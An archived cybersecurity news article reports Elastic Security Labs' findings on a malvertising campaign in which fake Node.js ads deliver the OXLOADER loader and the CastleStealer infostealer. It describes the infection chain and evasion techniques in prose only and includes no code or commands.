CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 22, 2026

New OXLOADER Loader Uses Malicious Google Ads to Deliver CastleStealer

The Hacker News Archived Jun 22, 2026 ✓ Full text saved

Cybersecurity researchers have disclosed details of a new campaign that delivers CastleStealer by means of a previously unreported malware loader dubbed OXLOADER. According to Elastic Security Labs, the campaign leverages malicious Google Ads as a starting point to distribute the malware. Evidence indicates that the threat actor is likely Russian-speaking and financially motivated, owing to the

Full text archived locally
✦ AI Summary · Claude Sonnet


    New OXLOADER Loader Uses Malicious Google Ads to Deliver CastleStealer Ravie LakshmananJun 22, 2026Malvertising / Endpoint Security Cybersecurity researchers have disclosed details of a new campaign that delivers CastleStealer by means of a previously unreported malware loader dubbed OXLOADER. According to Elastic Security Labs, the campaign leverages malicious Google Ads as a starting point to distribute the malware. Evidence indicates that the threat actor is likely Russian-speaking and financially motivated, owing to the presence of explicit exclusions to prevent infecting machines located in the Commonwealth of Independent States (CIS) region. The campaign has been codenamed REF8372. "The loader uses several obfuscation layers (control-flow flattening, opaque predicates, mixed Boolean-Arithmetic), self-modifying decryption stubs, and abuses the Windows .reloc section to stage shellcode," researchers Daniel Stepanic and Jia Yu Chan said in a technical breakdown. The attack begins when unsuspecting users enter queries such as "lts version of node.js" on search engines like Google, redirecting them to a fake website ("node-js[.]prentiva99[.]info") surfaced via bogus ads published under the verified name "ВОЛОДИМИР ТЕРЕЩЕНКО" that's purportedly based in Ukraine. It's currently unknown if the advertiser account is linked to the actual threat actor, or if it's a front account or a purchased identity. The advertiser account, along with its ad campaigns, was removed from Google on May 14, 2026. Users who end up interacting with the site are served a batch script hosted on Storj, a decentralized, open-source cloud storage platform. The abuse of Storj once again illustrates how threat actors continue to leverage legitimate services to evade domain-based reputation filters. Running the batch script displays a bogus installation wizard user interface (UI), while stealthily downloading a next-stage payload, a Storj-hosted executable dubbed OXLOADER through a PowerShell command and executing it with -Verb RunAs to trigger a Windows User Account Control (UAC) prompt.  The attack then employs DLL side-loading to launch a rogue DLL, which then proceeds to decrypt and execute the CastleStealer payload. OXLOADER also makes use of techniques like control-flow flattening (CFF) and mixed Boolean-Arithmetic (MBA) to evade static detection, while also taking steps to ensure it's not run on sandboxed environments. CastleStealer is a .NET information stealer that was recently distributed alongside CastleLoader through a ClickFix-style lure masquerading as a free image-editing tool as part of a campaign codenamed BackgroundFix. CastleLoader is attributed to a threat activity cluster known as GrayBravo. "OXLOADER is in an early operational phase, but the engineering behind it suggests this family is worth watching," Elastic said. "The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and unique staging techniques reflect deliberate engineering choices to evade analysis." "That investment is paying off, resulting in low detection rates across static engines and detonation runs, giving OXLOADER a window to operate before it gets hunted down." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  DLL side-loading, Elastic Security Labs, Google Ads, Information Stealer, malvertising, Malware, powershell ⚡ Top Stories This Week Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication U.S. Orders Anthropic to Suspend Fable 5 and Mythos 5 Access for Foreign Nationals Anthropic Releases Claude Fable 5, Its Most Powerful AI Yet, With Cyber Safeguards Chrome V8 Zero-Day CVE-2026-11645 Exploited in the Wild - Patch Now New GreatXML Exploit Bypasses Windows BitLocker via Recovery Partition XML Files Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit China-Linked Hackers Backdoored Linux Login Software to Hide for Nearly a Decade Microsoft Defender RoguePlanet Zero-Day Grants SYSTEM Access on Updated Windows Ivanti, Fortinet, and SAP Release Patches for Multiple Critical Vulnerabilities ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More Agentjacking Attack Tricks AI Coding Agents Into Running Malicious Code Cybersecurity Stars Awards 2026: Winners Announced Across 95 Categories Microsoft Patches Record 206 Flaws, Including Three Zero-Days and Critical RCE Bugs Load More ▼ ⭐ Featured Resources [Watch Demo] See Which Security Gaps Attackers Could Exploit First AI Can’t Stop Every Attack. Learn How Zero Trust Can Block What’s Unknown Get the 2026 Guide to Govern and Secure Enterprise AI Agents at Scale Have You Outgrown Your MDR? 7 Warning Signs Every CISO Should Check
    💬 Team Notes
    Article Info
    Source
    The Hacker News
    Category
    ◇ Industry News & Leadership
    Published
    Jun 22, 2026
    Archived
    Jun 22, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗